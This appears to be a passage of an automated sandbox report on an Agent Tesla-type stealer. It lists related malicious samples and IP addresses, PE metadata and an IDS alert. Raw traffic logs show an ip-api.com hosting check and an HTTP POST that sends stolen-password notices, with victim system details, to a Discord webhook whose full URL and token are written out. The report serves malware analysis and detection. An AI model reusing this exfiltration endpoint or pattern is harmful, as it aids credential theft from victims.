                                                                      Wage_Plan_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                      • 208.95.112.1
                                                                      DHL AWB_5934_5682.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1
                                                                      Yeni sipari#U015f.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • 208.95.112.1
                                                                      Payment Slip (SWIFT)#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • 208.95.112.1
                                                                      ESTADO DE CUENTA DHL -46474637.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CLOUDFLARENETUSproforma invoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • 172.67.74.152
                                                                      https://adobeacrobatreviewandsigndocumet.se-sto-1.linodeobjects.com/outlook-office-com-automailerbj-7634-3434-234-2324-azure4324-office3653-7644-4443-434.htmlGet hashmaliciousUnknownBrowse
                                                                      • 104.17.3.184
                                                                      https://colourlyrics.com/fe/KtHc5ruvtRkZFoArrtthaJsvCmg3Rb7X4JToP666Ry87hz3e3rFuRJGAPKBcoBZjAZJZK4pouqXoieozb8x97ijrpxmdxNfsxaBCR2nGFdZnrhtCVLagarbeJ5bjm2rcgeCmZPnkCo2NqoSFB3o6MQGet hashmaliciousUnknownBrowse
                                                                      • 104.16.122.175
                                                                      biden.ps1Get hashmaliciousUnknownBrowse
                                                                      • 172.67.186.190
                                                                      QJwM0vJ5mk.exeGet hashmaliciousLummaCBrowse
                                                                      • 172.67.74.152
                                                                      mUY60MPRcJ.exeGet hashmaliciousLummaCBrowse
                                                                      • 172.67.187.135
                                                                      SecuriteInfo.com.Win32.PWSX-gen.5935.26892.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • 172.67.156.246
                                                                      SecuriteInfo.com.Trojan.Locsyz.2.2D0.720.16964.6395.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • 104.26.12.205
                                                                      http://avsvmcloud.comGet hashmaliciousUnknownBrowse
                                                                      • 1.1.1.1
                                                                      https://topteamoscarlubricants.online/nba#ZGluYUBqdmRtLmNvLnphGet hashmaliciousHTMLPhisherBrowse
                                                                      • 104.18.11.207
                                                                      TUT-ASUSQUOTATION_MARQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • 208.95.112.1
                                                                      SecuriteInfo.com.Win32.CrypterX-gen.9933.28197.exeGet hashmaliciousPureLog Stealer, Xehook StealerBrowse
                                                                      • 208.95.112.1
                                                                      x.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                      • 208.95.112.1
                                                                      SecuriteInfo.com.Win32.PWSX-gen.23268.16982.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • 208.95.112.1
                                                                      salaryinfo24.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                      • 208.95.112.1
                                                                      Wage_Plan_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                      • 208.95.112.1
                                                                      DHL AWB_5934_5682.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1
                                                                      Yeni sipari#U015f.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • 208.95.112.1
                                                                      Payment Slip (SWIFT)#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • 208.95.112.1
                                                                      ESTADO DE CUENTA DHL -46474637.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      3b5074b1b5d032e5620f69f9f700ff0eproforma invoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • 162.159.137.232
                                                                      biden.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.137.232
                                                                      QJwM0vJ5mk.exeGet hashmaliciousLummaCBrowse
                                                                      • 162.159.137.232
                                                                      SecuriteInfo.com.Trojan.Locsyz.2.2D0.720.16964.6395.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • 162.159.137.232
                                                                      SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeGet hashmaliciousClipboard Hijacker, XWorm, XmrigBrowse
                                                                      • 162.159.137.232
                                                                      11111.lnkGet hashmaliciousUnknownBrowse
                                                                      • 162.159.137.232
                                                                      SecuriteInfo.com.Win64.CrypterX-gen.24907.17990.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                      • 162.159.137.232
                                                                      f699.jsGet hashmaliciousUnknownBrowse
                                                                      • 162.159.137.232
                                                                      x.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                      • 162.159.137.232
                                                                      Move Mouse.exeGet hashmaliciousUnknownBrowse
                                                                      • 162.159.137.232
                                                                      No context
                                                                      Process:C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):716
                                                                      Entropy (8bit):5.350074230533824
                                                                      Encrypted:false
                                                                      SSDEEP:12:Q3La/KDLI4MWuPTAyoDLI4MWuPrePEniOKbbDLI4MWuPJKAVKharkvoDLI4MWuCv:ML9E4KXAE4KzecKDE4KhKiKhIE4Ks
                                                                      MD5:7D0A4E7B65EB8F1F991914349DFC3F38
                                                                      SHA1:ADDE7BF0347ACABF117A836B31C455673592DB68
                                                                      SHA-256:D82B9DB5A8FDE89D96A2D30A8480D84F028C959A47C1D954CE22A7CE983E9CA6
                                                                      SHA-512:EBB65BF1F610E386F04BCE56BA968B8D63596856B2352F0EC948892ECD1B00CAC34FC4AAD2DC82E4653F7A8B13E2321C721D4A95019B98B1D8608CF802A172F7
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.2862849715382
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                      File name:T_240369_S#U0130PAR#U0130S.exe
                                                                      File size:2'987'520 bytes
                                                                      MD5:73f2aa0989d9fcb98763fbb461422f9f
                                                                      SHA1:27b4d0302c43e95c19942eea9dea94d673e18578
                                                                      SHA256:843fa4dd9e5d81d150e4d6cd251dc26dafc7409bb4516abebce70114c62548c6
                                                                      SHA512:040c671c5f1bf2eecc391680ce18f728d4c818b170d9e240541f2cfc8fa1f160c6f3feeacec78ccbfcd0010694c9a17acf926e0c0a9b8a7145bc199970dd7abd
                                                                      SSDEEP:49152:A7XLm8xI2nCY8EoVZT6JGsBp0PWInu9vxnBoqdWGJa/3HWPWar:mbmJYpoVwlpuWX9l3a/3HMWa
                                                                      TLSH:5DD59E62668E45FCCE4A6B3AC29F66012BFDD1C10773C75F2D1A362B388335BD90549A
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....(.f..................-.........~.-.. ....-...@.. ....................................`................................
                                                                      Icon Hash:90cececece8e8eb0
                                                                      Entrypoint:0x6dab7e
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x66052811 [Thu Mar 28 08:19:29 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2dab300x4b.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2dc0000x528.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2de0000xc.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x20000x2d8b840x2d8c00cf14c388eb314d7f40f7f1253599315dunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x2dc0000x5280x6005a53f8df5c3fdb6d0bdac0e1b5375ab7False0.390625data3.760679040227803IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x2de0000xc0x200990762cb0a8837f485aa32f3d7b85be7False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_VERSION0x2dc0a00x2d4data0.43370165745856354
                                                                      RT_MANIFEST0x2dc3740x1b4XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators0.5642201834862385
                                                                      DLLImport
                                                                      mscoree.dll_CorExeMain
                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      03/28/24-13:58:56.493013TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49730443192.168.2.4162.159.137.232
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Mar 28, 2024 13:58:55.081116915 CET4972980192.168.2.4208.95.112.1
                                                                      Mar 28, 2024 13:58:55.206790924 CET8049729208.95.112.1192.168.2.4
                                                                      Mar 28, 2024 13:58:55.206891060 CET4972980192.168.2.4208.95.112.1
                                                                      Mar 28, 2024 13:58:55.207818985 CET4972980192.168.2.4208.95.112.1
                                                                      Mar 28, 2024 13:58:55.333668947 CET8049729208.95.112.1192.168.2.4
                                                                      Mar 28, 2024 13:58:55.389553070 CET4972980192.168.2.4208.95.112.1
                                                                      Mar 28, 2024 13:58:56.049932003 CET49730443192.168.2.4162.159.137.232
                                                                      Mar 28, 2024 13:58:56.049969912 CET44349730162.159.137.232192.168.2.4
                                                                      Mar 28, 2024 13:58:56.050059080 CET49730443192.168.2.4162.159.137.232
                                                                      Mar 28, 2024 13:58:56.058064938 CET49730443192.168.2.4162.159.137.232
                                                                      Mar 28, 2024 13:58:56.058074951 CET44349730162.159.137.232192.168.2.4
                                                                      Mar 28, 2024 13:58:56.274391890 CET44349730162.159.137.232192.168.2.4
                                                                      Mar 28, 2024 13:58:56.274468899 CET49730443192.168.2.4162.159.137.232
                                                                      Mar 28, 2024 13:58:56.277549028 CET49730443192.168.2.4162.159.137.232
                                                                      Mar 28, 2024 13:58:56.277556896 CET44349730162.159.137.232192.168.2.4
                                                                      Mar 28, 2024 13:58:56.278059006 CET44349730162.159.137.232192.168.2.4
                                                                      Mar 28, 2024 13:58:56.327042103 CET49730443192.168.2.4162.159.137.232
                                                                      Mar 28, 2024 13:58:56.333962917 CET49730443192.168.2.4162.159.137.232
                                                                      Mar 28, 2024 13:58:56.376246929 CET44349730162.159.137.232192.168.2.4
                                                                      Mar 28, 2024 13:58:56.492614031 CET44349730162.159.137.232192.168.2.4
                                                                      Mar 28, 2024 13:58:56.492957115 CET49730443192.168.2.4162.159.137.232
                                                                      Mar 28, 2024 13:58:56.492969036 CET44349730162.159.137.232192.168.2.4
                                                                      Mar 28, 2024 13:58:56.785614014 CET44349730162.159.137.232192.168.2.4
                                                                      Mar 28, 2024 13:58:56.785732031 CET44349730162.159.137.232192.168.2.4
                                                                      Mar 28, 2024 13:58:56.785785913 CET49730443192.168.2.4162.159.137.232
                                                                      Mar 28, 2024 13:58:56.785795927 CET44349730162.159.137.232192.168.2.4
                                                                      Mar 28, 2024 13:58:56.785847902 CET44349730162.159.137.232192.168.2.4
                                                                      Mar 28, 2024 13:58:56.785933971 CET49730443192.168.2.4162.159.137.232
                                                                      Mar 28, 2024 13:58:56.789705992 CET49730443192.168.2.4162.159.137.232
                                                                      Mar 28, 2024 13:58:56.808509111 CET4972980192.168.2.4208.95.112.1
                                                                      Mar 28, 2024 13:58:56.809144020 CET49731443192.168.2.4162.159.137.232
                                                                      Mar 28, 2024 13:58:56.809174061 CET44349731162.159.137.232192.168.2.4
                                                                      Mar 28, 2024 13:58:56.809346914 CET49731443192.168.2.4162.159.137.232
                                                                      Mar 28, 2024 13:58:56.809550047 CET49731443192.168.2.4162.159.137.232
                                                                      Mar 28, 2024 13:58:56.809561014 CET44349731162.159.137.232192.168.2.4
                                                                      Mar 28, 2024 13:58:56.933857918 CET8049729208.95.112.1192.168.2.4
                                                                      Mar 28, 2024 13:58:56.933975935 CET4972980192.168.2.4208.95.112.1
                                                                      Mar 28, 2024 13:58:57.004930973 CET44349731162.159.137.232192.168.2.4
                                                                      Mar 28, 2024 13:58:57.006681919 CET49731443192.168.2.4162.159.137.232
                                                                      Mar 28, 2024 13:58:57.006717920 CET44349731162.159.137.232192.168.2.4
                                                                      Mar 28, 2024 13:58:57.235474110 CET44349731162.159.137.232192.168.2.4
                                                                      Mar 28, 2024 13:58:57.235748053 CET49731443192.168.2.4162.159.137.232
                                                                      Mar 28, 2024 13:58:57.235783100 CET44349731162.159.137.232192.168.2.4
                                                                      Mar 28, 2024 13:58:57.423928976 CET44349731162.159.137.232192.168.2.4
                                                                      Mar 28, 2024 13:58:57.424067974 CET44349731162.159.137.232192.168.2.4
                                                                      Mar 28, 2024 13:58:57.424164057 CET49731443192.168.2.4162.159.137.232
                                                                      Mar 28, 2024 13:58:57.424724102 CET49731443192.168.2.4162.159.137.232
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Mar 28, 2024 13:58:54.942665100 CET5791853192.168.2.41.1.1.1
                                                                      Mar 28, 2024 13:58:55.046989918 CET53579181.1.1.1192.168.2.4
                                                                      Mar 28, 2024 13:58:55.954102039 CET6162653192.168.2.41.1.1.1
                                                                      Mar 28, 2024 13:58:56.049057007 CET53616261.1.1.1192.168.2.4
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Mar 28, 2024 13:58:54.942665100 CET192.168.2.41.1.1.10x784cStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                      Mar 28, 2024 13:58:55.954102039 CET192.168.2.41.1.1.10x36b5Standard query (0)discord.comA (IP address)IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Mar 28, 2024 13:58:55.046989918 CET1.1.1.1192.168.2.40x784cNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                      Mar 28, 2024 13:58:56.049057007 CET1.1.1.1192.168.2.40x36b5No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                      Mar 28, 2024 13:58:56.049057007 CET1.1.1.1192.168.2.40x36b5No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                      Mar 28, 2024 13:58:56.049057007 CET1.1.1.1192.168.2.40x36b5No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                      Mar 28, 2024 13:58:56.049057007 CET1.1.1.1192.168.2.40x36b5No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                      Mar 28, 2024 13:58:56.049057007 CET1.1.1.1192.168.2.40x36b5No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                      • discord.com
                                                                      • ip-api.com
                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.449729208.95.112.1807340C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 28, 2024 13:58:55.207818985 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                      Host: ip-api.com
                                                                      Connection: Keep-Alive
                                                                      Mar 28, 2024 13:58:55.333668947 CET175INHTTP/1.1 200 OK
                                                                      Date: Thu, 28 Mar 2024 12:58:55 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 6
                                                                      Access-Control-Allow-Origin: *
                                                                      X-Ttl: 60
                                                                      X-Rl: 44
                                                                      Data Raw: 66 61 6c 73 65 0a
                                                                      Data Ascii: false


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.449730162.159.137.2324437340C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-03-28 12:58:56 UTC387OUTPOST /api/webhooks/1220536277670170814/IOSQHt77jsZT7zo7kkUiyq8x8TaToq4-BxVLqMXGe4ffWubgOFeoq2CnEl3NjjJYkJNd HTTP/1.1
                                                                      Content-Type: multipart/form-data; boundary=----------bbf04aceaf2e4ca780dd290cb3f9ba1c
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                      Host: discord.com
                                                                      Content-Length: 1168
                                                                      Expect: 100-continue
                                                                      Connection: Keep-Alive
                                                                      2024-03-28 12:58:56 UTC25INHTTP/1.1 100 Continue
                                                                      2024-03-28 12:58:56 UTC1168OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 62 62 66 30 34 61 63 65 61 66 32 65 34 63 61 37 38 30 64 64 32 39 30 63 62 33 66 39 62 61 31 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 6e 61 6d 65 22 0d 0a 0d 0a 6a 6f 6e 65 73 2d 35 32 38 31 31 30 20 32 30 32 34 2d 30 33 2d 32 38 20 31 33 2d 35 38 2d 35 35 2e 68 74 6d 6c 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 62 62 66 30 34 61 63 65 61 66 32 65 34 63 61 37 38 30 64 64 32 39 30 63 62 33 66 39 62 61 31 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 66 6f 72 6d 61 74 22 0d 0a 0d 0a 68 74 6d 6c 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 62 62
                                                                      Data Ascii: ------------bbf04aceaf2e4ca780dd290cb3f9ba1cContent-Disposition: form-data; name="filename"user-528110 2024-03-28 13-58-55.html------------bbf04aceaf2e4ca780dd290cb3f9ba1cContent-Disposition: form-data; name="fileformat"html------------bb
                                                                      2024-03-28 12:58:56 UTC1369INHTTP/1.1 200 OK
                                                                      Date: Thu, 28 Mar 2024 12:58:56 GMT
                                                                      Content-Type: application/json
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      set-cookie: __dcfduid=effb2dd4ed0211eeb5d426688c8132a5; Expires=Tue, 27-Mar-2029 12:58:56 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                      x-ratelimit-limit: 5
                                                                      x-ratelimit-remaining: 4
                                                                      x-ratelimit-reset: 1711630737
                                                                      x-ratelimit-reset-after: 1
                                                                      vary: Accept-Encoding
                                                                      via: 1.1 google
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rPbOKPFnatwgzZcPQn%2Bf0TIxkDzFHe6xlvZlIKA0Y171R%2FQXT6ohARS1aJQXJ9MMooVsgSW9Ragg%2FlJ%2BC%2F%2BWTWIEWHVDZoMMAY5XP9Cxcnw1ifIWOA%2B0R6VqW8jq"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                      Set-Cookie: __sdcfduid=effb2dd4ed0211eeb5d426688c8132a5068e8a62b2a96d2ee6f3d5dd64075c958362c1fff25cc7b6bee0deee6d73edea; Expires=Tue, 27-Mar-2029 12:58:56 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                      Set-Cookie: __cfruid=1630cf4dd8bf069a35a06a9beafd86e864c4fbb7-1711630736; path=/; domain=.discord.com; HttpO
                                                                      2024-03-28 12:58:56 UTC239INData Raw: 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 41 6f 56 63 41 6c 67 4b 6d 31 51 75 66 6f 74 5a 55 2e 46 44 66 75 55 46 51 52 54 47 51 61 56 34 75 67 44 78 59 33 72 6e 41 46 55 2d 31 37 31 31 36 33 30 37 33 36 37 33 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 36 62 37 63 62 36 36 63 38 64 33 32 30 34 62 2d 49 41 44 0d 0a 0d 0a
                                                                      Data Ascii: nly; Secure; SameSite=NoneSet-Cookie: _cfuvid=AoVcAlgKm1QufotZU.FDfuUFQRTGQaV4ugDxY3rnAFU-1711630736736-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 86b7cb66c8d3204b-IAD
                                                                      2024-03-28 12:58:56 UTC1269INData Raw: 34 65 65 0d 0a 7b 22 69 64 22 3a 22 31 32 32 32 38 39 32 36 38 35 39 36 33 30 33 38 38 30 33 22 2c 22 74 79 70 65 22 3a 30 2c 22 63 6f 6e 74 65 6e 74 22 3a 22 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 5c 6e 5c 6e 54 69 6d 65 3a 20 30 33 2f 32 38 2f 32 30 32 34 20 31 33 3a 35 38 3a 35 35 5c 6e 55 73 65 72 20 4e 61 6d 65 3a 20 6a 6f 6e 65 73 2f 35 32 38 31 31 30 5c 6e 4f 53 46 75 6c 6c 4e 61 6d 65 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 43 50 55 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 52 41 4d 3a 20 38 31 39 31 2e 32 35 20 4d 42 22 2c 22 63 68 61 6e 6e 65 6c 5f 69 64 22 3a 22 31 32 32 30 35 33 34 33 37 38 39 37 35 38 35
                                                                      Data Ascii: 4ee{"id":"1222892685963038803","type":0,"content":"New PW Recovered!\n\nTime: 03/28/2024 13:58:55\nUser Name: user/528110\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB","channel_id":"122053437897585
                                                                      2024-03-28 12:58:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.449731162.159.137.2324437340C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe
                                                                      TimestampBytes transferredDirectionData
